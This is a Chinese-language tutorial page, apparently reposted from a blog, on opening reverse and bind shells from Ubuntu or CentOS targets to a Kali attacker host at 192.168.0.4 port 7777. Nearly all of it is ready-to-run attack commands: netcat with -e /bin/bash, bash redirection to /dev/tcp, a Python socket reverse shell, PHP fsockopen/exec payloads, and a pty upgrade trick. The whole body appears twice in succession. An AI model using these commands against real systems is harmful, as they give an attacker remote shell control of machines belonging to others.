微信公众号搜"智元新知"关注
微信扫一扫可直接关注哦!

nc反弹shell的方法

NC反弹shell的几种方法
假如ubuntu、CentOS为目标服务器系统

kali为攻击者的系统,ip为:192.168.0.4,开放7777端口且没被占用

最终是将ubuntu、CentOS的shell反弹到kali上

正向反弹shell
ubuntu或者CentOS上面输入

nc -lvp 7777 -e /bin/bash
kali上输入

nc ip 7777
正向反弹是目标机先执行nc命令,然后kali上再进行nc监听,即可反弹shell。

需要目标机安装nc。

反向反弹shell
方法1:bash反弹
bash -i >& /dev/TCP/IP/port 0>&1
但首先需要在kali上使用nc监听端口:

nc -lvp 7777
方法在ubuntu下不会反弹成功,CentOS可以反弹成功。

方法2:python反弹
反弹shell的命令如下:

python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.soCK_STREAM);s.connect(('ip',port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"
首先,使用nc在kali上监听端口:

nc -lvp 7777
在CentOS或者ubuntu下使用python去反向连接,输入:

python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.soCK_STREAM);s.connect(('192.168.0.4',7777));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);
方法ubuntu和Linux均反弹成功。

方法3
首先在kali上输入nc监听:

nc -lvp 7777
在CentOS或者ubuntu 上使用nc去反向连接,命令如下:

nc -e /bin/bash 192.168.0.4 7777
方法4:PHP反弹shell
首先在kali上输入:

nc -lvp 7777
然后在目标机上输入:

PHP- 'exec("/bin/bash -i >& /dev/tcp/192.168.0.4/7777")'

PHP -r '$sock=fsockopen("192.168.0.4",7777);exec("/bin/bash -i 0>&3 1>&3 2>&3");'
注意PHP反弹shell的这些方法都需要PHP关闭safe_mode这个选项,才可以使用exec函数

遇到反弹后不是正常的shell,可用命令:

python -c 'import pty;pty.spawn("/bin/bash")'
转化为常规的shell。NC反弹shell的几种方法
假如ubuntu、CentOS为目标服务器系统

kali为攻击者的系统,ip为:192.168.0.4,开放7777端口且没被占用

最终是将ubuntu、CentOS的shell反弹到kali上

正向反弹shell
ubuntu或者CentOS上面输入

nc -lvp 7777 -e /bin/bash
kali上输入

nc ip 7777
正向反弹是目标机先执行nc命令,然后kali上再进行nc监听,即可反弹shell。

需要目标机安装nc。

反向反弹shell
方法1:bash反弹
bash -i >& /dev/TCP/IP/port 0>&1
但首先需要在kali上使用nc监听端口:

nc -lvp 7777
方法在ubuntu下不会反弹成功,CentOS可以反弹成功。

方法2:python反弹
反弹shell的命令如下:

python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.soCK_STREAM);s.connect(('ip',port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"
首先,使用nc在kali上监听端口:

nc -lvp 7777
在CentOS或者ubuntu下使用python去反向连接,输入:

python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.soCK_STREAM);s.connect(('192.168.0.4',7777));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);
方法ubuntu和Linux均反弹成功。

方法3
首先在kali上输入nc监听:

nc -lvp 7777
在CentOS或者ubuntu 上使用nc去反向连接,命令如下:

nc -e /bin/bash 192.168.0.4 7777
方法4:PHP反弹shell
首先在kali上输入:

nc -lvp 7777
然后在目标机上输入:

PHP- 'exec("/bin/bash -i >& /dev/tcp/192.168.0.4/7777")'

PHP -r '$sock=fsockopen("192.168.0.4",7777);exec("/bin/bash -i 0>&3 1>&3 2>&3");'
注意PHP反弹shell的这些方法都需要PHP关闭safe_mode这个选项,才可以使用exec函数

遇到反弹后不是正常的shell,可用命令:

python -c 'import pty;pty.spawn("/bin/bash")'
转化为常规的shell。

https://www.cnblogs.com/-chenxs/p/11748488.html

版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 [email protected] 举报,一经查实,本站将立刻删除。

相关推荐